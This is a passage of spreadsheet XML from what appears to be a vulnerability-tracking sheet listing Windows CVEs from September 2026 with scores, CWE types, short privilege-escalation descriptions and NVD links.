r="A984" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B984" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C984" s="5" t="inlineStr"><is><t>CVE-2026-69838</t></is></c><c r="D984" s="5" t="n"><v>7</v></c><c r="E984" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F984" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G984" s="5" t="inlineStr" /><c r="H984" s="5" t="n"><v>0.003</v></c><c r="I984" s="5" t="inlineStr" /><c r="J984" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K98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4" s="5" t="inlineStr" /><c r="M984" s="5" t="inlineStr" /><c r="N984" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O984" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P984" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q984" s="5" t="inlineStr" /><c r="R984" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S984" s="5" t="inlineStr"><is><t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T984" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69838</t></is></c></row><row r="985"><c r="A985" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B985" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C985" s="5" t="inlineStr"><is><t>CVE-2026-69859</t></is></c><c r="D985" s="5" t="n"><v>7</v></c><c r="E985" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F985" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G985" s="5" t="inlineStr" /><c r="H985" s="5" t="n"><v>0.002</v></c><c r="I985" s="5" t="inlineStr" /><c r="J985" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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5" s="5" t="inlineStr" /><c r="M985" s="5" t="inlineStr" /><c r="N985" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O985" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P985" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q985" s="5" t="inlineStr" /><c r="R985" s="5" t="inlineStr"><is><t>CWE-191, CWE-367</t></is></c><c r="S985" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T985" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69859</t></is></c></row><row r="986"><c r="A986" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B986" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C986" s="5" t="inlineStr"><is><t>CVE-2026-69866</t></is></c><c r="D986" s="5" t="n"><v>7</v></c><c r="E986" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F986" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G986" s="5" t="inlineStr" /><c r="H986" s="5" t="n"><v>0.003</v></c><c r="I986" s="5" t="inlineStr" /><c r="J986" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K98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86" s="5" t="inlineStr" /><c r="M986" s="5" t="inlineStr" /><c r="N986" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O986" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P986" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q986" s="5" t="inlineStr" /><c r="R986" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S986" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T986" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69866</t></is></c></row><row r="987"><c r="A987" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B987" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C987" s="5" t="inlineStr"><is><t>CVE-2026-69889</t></is></c><c r="D987" s="5" t="n"><v>7</v></c><c r="E987" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F987" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G987" s="5" t="inlineStr" /><c r="H987" s="5" t="n"><v>0.003</v></c><c r="I987" s="5" t="inlineStr" /><c r="J987" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K98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87" s="5" t="inlineStr" /><c r="M987" s="5" t="inlineStr" /><c r="N987" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O987" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P987" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q987" s="5" t="inlineStr" /><c r="R987" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S987" s="5" t="inlineStr"><is><t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T987" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69889</t></is></c></row><row r="988"><c r="A988" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B988" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C988" s="5" t="inlineStr"><is><t>CVE-2026-69891</t></is></c><c r="D988" s="5" t="n"><v>7</v></c><c r="E988" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F988" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G988" s="5" t="inlineStr" /><c r="H988" s="5" t="n"><v>0.003</v></c><c r="I988" s="5" t="inlineStr" /><c r="J988" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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88" s="5" t="inlineStr" /><c r="M988" s="5" t="inlineStr" /><c r="N988" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O988" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P988" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q988" s="5" t="inlineStr" /><c r="R988" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S988" s="5" t="inlineStr"><is><t>Use after free in Windows Media allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T988" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69891</t></is></c></row><row r="989"><c r="A989" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B989" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C989" s="5" t="inlineStr"><is><t>CVE-2026-69896</t></is></c><c r="D989" s="5" t="n"><v>7</v></c><c r="E989" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F989" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G989" s="5" t="inlineStr" /><c r="H989" s="5" t="n"><v>0.003</v></c><c r="I989" s="5" t="inlineStr" /><c r="J989" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K989" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L989" s="5" t="inlineStr" /><c r="M989" s="5" t="inlineStr" /><c r="N989" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O989" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P989" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q989" s="5" t="inlineStr" /><c r="R989" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S989" s="5" t="inlineStr"><is><t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T989" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69896</t></is></c></row><row r="990"><c r="A990" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B990" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C990" s="5" t="inlineStr"><is><t>CVE-2026-69911</t></is></c><c r="D990" s="5" t="n"><v>7</v></c><c r="E990" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F990" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G990" s="5" t="inlineStr" /><c r="H990" s="5" t="n"><v>0.003</v></c><c r="I990" s="5" t="inlineStr" /><c r="J990" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K99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0" s="5" t="inlineStr" /><c r="M990" s="5" t="inlineStr" /><c r="N990" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O990" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P990" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q990" s="5" t="inlineStr" /><c r="R990" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S990" s="5" t="inlineStr"><is><t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T990" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69911</t></is></c></row><row r="991"><c r="A991" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B991" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C991" s="5" t="inlineStr"><is><t>CVE-2026-70283</t></is></c><c r="D991" s="5" t="n"><v>7</v></c><c r="E991" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F991" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G991" s="5" t="inlineStr" /><c r="H991" s="5" t="n"><v>0.002</v></c><c r="I991" s="5" t="inlineStr" /><c r="J991" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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1" s="5" t="inlineStr" /><c r="M991" s="5" t="inlineStr" /><c r="N991" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O991" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P991" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q991" s="5" t="inlineStr" /><c r="R991" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S991" s="5" t="inlineStr"><is><t>Incorrect authorization in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T991" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70283</t></is></c></row><row r="992"><c r="A992" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B992" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C992" s="5" t="inlineStr"><is><t>CVE-2026-70562</t></is></c><c r="D992" s="5" t="n"><v>7</v></c><c r="E992" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F992" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G992" s="5" t="inlineStr" /><c r="H992" s="5" t="n"><v>0.003</v></c><c r="I992" s="5" t="inlineStr" /><c r="J992" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K99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2" s="5" t="inlineStr" /><c r="M992" s="5" t="inlineStr" /><c r="N992" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O992" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P992" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q992" s="5" t="inlineStr" /><c r="R992" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S992" s="5" t="inlineStr"><is><t>Double free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T992" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70562</t></is></c></row><row r="993"><c r="A993" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B993" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C993" s="5" t="inlineStr"><is><t>CVE-2026-70565</t></is></c><c r="D993" s="5" t="n"><v>7</v></c><c r="E993" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F993" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G993" s="5" t="inlineStr" /><c r="H993" s="5" t="n"><v>0.003</v></c><c r="I993" s="5" t="inlineStr" /><c r="J993" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K99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3" s="5" t="inlineStr" /><c r="M993" s="5" t="inlineStr" /><c r="N993" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O993" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P993" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q993" s="5" t="inlineStr" /><c r="R993" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S993" s="5" t="inlineStr"><is><t>Use after free in Windows AF_UNIX Socket Provider allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T993" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70565</t></is></c></row><row r="994"><c r="A994" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B994" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C994" s="5" t="inlineStr"><is><t>CVE-2026-70567</t></is></c><c r="D994" s="5" t="n"><v>7</v></c><c r="E994" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F994" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G994" s="5" t="inlineStr" /><c r="H994" s="5" t="n"><v>0.003</v></c><c r="I994" s="5" t="inlineStr" /><c r="J994" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K994" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L994" s="5" t="inlineStr" /><c r="M994" s="5" t="inlineStr" /><c r="N994" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O994" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P994" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q994" s="5" t="inlineStr" /><c r="R994" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S994" s="5" t="inlineStr"><is><t>Double free in Windows Display Enhancement Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T994" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70567</t></is></c></row><row r="995"><c r="A995" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B995" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C995" s="5" t="inlineStr"><is><t>CVE-2026-70568</t></is></c><c r="D995" s="5" t="n"><v>7</v></c><c r="E995" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F995" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G995" s="5" t="inlineStr" /><c r="H995" s="5" t="n"><v>0.003</v></c><c r="I995" s="5" t="inlineStr" /><c r="J995" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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5" s="5" t="inlineStr" /><c r="M995" s="5" t="inlineStr" /><c r="N995" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O995" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P995" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q995" s="5" t="inlineStr" /><c r="R995" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S995" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Defender Firewall Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T995" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70568</t></is></c></row><row r="996"><c r="A996" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B996" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C996" s="5" t="inlineStr"><is><t>CVE-2026-70573</t></is></c><c r="D996" s="5" t="n"><v>7</v></c><c r="E996" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F996" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G996" s="5" t="inlineStr" /><c r="H996" s="5" t="n"><v>0.003</v></c><c r="I996" s="5" t="inlineStr" /><c r="J996" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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96" s="5" t="inlineStr" /><c r="M996" s="5" t="inlineStr" /><c r="N996" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O996" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P996" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q996" s="5" t="inlineStr" /><c r="R996" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S996" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T996" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70573</t></is></c></row><row r="997"><c r="A997" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B997" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C997" s="5" t="inlineStr"><is><t>CVE-2026-70577</t></is></c><c r="D997" s="5" t="n"><v>7</v></c><c r="E997" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F997" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G997" s="5" t="inlineStr" /><c r="H997" s="5" t="n"><v>0.003</v></c><c r="I997" s="5" t="inlineStr" /><c r="J997" s="5" t="inlineStr" /><c r="K997" s="5" t="inlineStr" /><c r="L997" s="5" t="inlineStr" /><c r="M997" s="5" t="inlineStr" /><c r="N997" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O997" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P997" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q997" s="5" t="inlineStr" /><c r="R997" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S997" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T997" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70577</t></is></c></row><row r="998"><c r="A998" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B998" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C998" s="5" t="inlineStr"><is><t>CVE-2026-70578</t></is></c><c r="D998" s="5" t="n"><v>7</v></c><c r="E998" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F998" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G998" s="5" t="inlineStr" /><c r="H998" s="5" t="n"><v>0.003</v></c><c r="I998" s="5" t="inlineStr" /><c r="J998" s="5" t="inlineStr" /><c r="K998" s="5" t="inlineStr" /><c r="L998" s="5" t="inlineStr" /><c r="M998" s="5" t="inlineStr" /><c r="N998" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O998" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P998" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q998" s="5" t="inlineStr" /><c r="R998" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S998" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T998" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70578</t></is></c></row><row r="999"><c r="A999" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B999" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C999" s="5" t="inlineStr"><is><t>CVE-2026-70585</t></is></c><c r="D999" s="5" t="n"><v>7</v></c><c r="E999" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F999" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G999" s="5" t="inlineStr" /><c r="H999" s="5" t="n"><v>0.003</v></c><c r="I999" s="5" t="inlineStr" /><c r="J999" s="5" t="inlineStr" /><c r="K999" s="5" t="inlineStr" /><c r="L999" s="5" t="inlineStr" /><c r="M999" s="5" t="inlineStr" /><c r="N999" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O999" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P999" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q999" s="5" t="inlineStr" /><c r="R999" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S999" s="5" t="inlineStr"><is><t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to execute code locally.</t></is></c><c r="T999" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70585</t></is></c></row><row r="1000"><c r="A1000" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1000" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1000" s="5" t="inlineStr"><is><t>CVE-2026-71332</t></is></c><c r="D1000" s="5" t="n"><v>7</v></c><c r="E1000" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1000" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1000" s="5" t="inlineStr" /><c r="H1000" s="5" t="n"><v>0.003</v></c><c r="I1000" s="5" t="inlineStr" /><c r="J1000" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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00" s="5" t="inlineStr" /><c r="M1000" s="5" t="inlineStr" /><c r="N1000" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1000" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1000" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1000" s="5" t="inlineStr" /><c r="R1000" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1000" s="5" t="inlineStr"><is><t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1000" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71332</t></is></c></row><row r="1001"><c r="A1001" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1001" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1001" s="5" t="inlineStr"><is><t>CVE-2026-71333</t></is></c><c r="D1001" s="5" t="n"><v>7</v></c><c r="E1001" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1001" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1001" s="5" t="inlineStr" /><c r="H1001" s="5" t="n"><v>0.003</v></c><c r="I1001" s="5" t="inlineStr" /><c r="J1001" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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01" s="5" t="inlineStr" /><c r="M1001" s="5" t="inlineStr" /><c r="N1001" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1001" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1001" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1001" s="5" t="inlineStr" /><c r="R1001" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1001" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1001" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71333</t></is></c></row><row r="1002"><c r="A1002" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1002" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1002" s="5" t="inlineStr"><is><t>CVE-2026-71340</t></is></c><c r="D1002" s="5" t="n"><v>7</v></c><c r="E1002" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1002" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1002" s="5" t="inlineStr" /><c r="H1002" s="5" t="n"><v>0.003</v></c><c r="I1002" s="5" t="inlineStr" /><c r="J1002" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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02" s="5" t="inlineStr" /><c r="M1002" s="5" t="inlineStr" /><c r="N1002" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1002" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1002" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1002" s="5" t="inlineStr" /><c r="R1002" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1002" s="5" t="inlineStr"><is><t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1002" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71340</t></is></c></row><row r="1003"><c r="A1003" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1003" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1003" s="5" t="inlineStr"><is><t>CVE-2026-71342</t></is></c><c r="D1003" s="5" t="n"><v>7</v></c><c r="E1003" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1003" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1003" s="5" t="inlineStr" /><c r="H1003" s="5" t="n"><v>0.002</v></c><c r="I1003" s="5" t="inlineStr" /><c r="J1003" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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03" s="5" t="inlineStr" /><c r="M1003" s="5" t="inlineStr" /><c r="N1003" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1003" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1003" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1003" s="5" t="inlineStr" /><c r="R1003" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1003" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1003" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71342</t></is></c></row><row r="1004"><c r="A1004" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1004" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1004" s="5" t="inlineStr"><is><t>CVE-2026-71351</t></is></c><c r="D1004" s="5" t="n"><v>7</v></c><c r="E1004" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1004" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1004" s="5" t="inlineStr" /><c r="H1004" s="5" t="n"><v>0.003</v></c><c r="I1004" s="5" t="inlineStr" /><c r="J1004" s="5" t="inlineStr" /><c r="K1004" s="5" t="inlineStr" /><c r="L1004" s="5" t="inlineStr" /><c r="M1004" s="5" t="inlineStr" /><c r="N1004" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1004" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1004" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1004" s="5" t="inlineStr" /><c r="R1004" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S1004" s="5" t="inlineStr"><is><t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1004" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71351</t></is></c></row><row r="1005"><c r="A1005" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1005" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1005" s="5" t="inlineStr"><is><t>CVE-2026-71353</t></is></c><c r="D1005" s="5" t="n"><v>7</v></c><c r="E1005" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1005" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1005" s="5" t="inlineStr" /><c r="H1005" s="5" t="n"><v>0.002</v></c><c r="I1005" s="5" t="inlineStr" /><c r="J1005" s="5" t="inlineStr" /><c r="K1005" s="5" t="inlineStr" /><c r="L1005" s="5" t="inlineStr" /><c r="M1005" s="5" t="inlineStr" /><c r="N1005" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1005" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1005" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1005" s="5" t="inlineStr" /><c r="R1005" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S1005" s="5" t="inlineStr"><is><t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1005" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71353</t></is></c></row><row r="1006"><c r="A1006" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1006" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1006" s="5" t="inlineStr"><is><t>CVE-2026-72926</t></is></c><c r="D1006" s="5" t="n"><v>7</v></c><c r="E1006" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1006" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1006" s="5" t="inlineStr" /><c r="H1006" s="5" t="n"><v>0.003</v></c><c r="I1006" s="5" t="inlineStr" /><c r="J1006" s="5" t="inlineStr" /><c r="K1006" s="5" t="inlineStr" /><c r="L1006" s="5" t="inlineStr" /><c r="M1006" s="5" t="inlineStr" /><c r="N1006" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1006" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1006" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1006" s="5" t="inlineStr" /><c r="R1006" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1006" s="5" t="inlineStr"><is><t>Use after free in Windows Internet Connection Sharing (ICS) allows an authorized attacker to 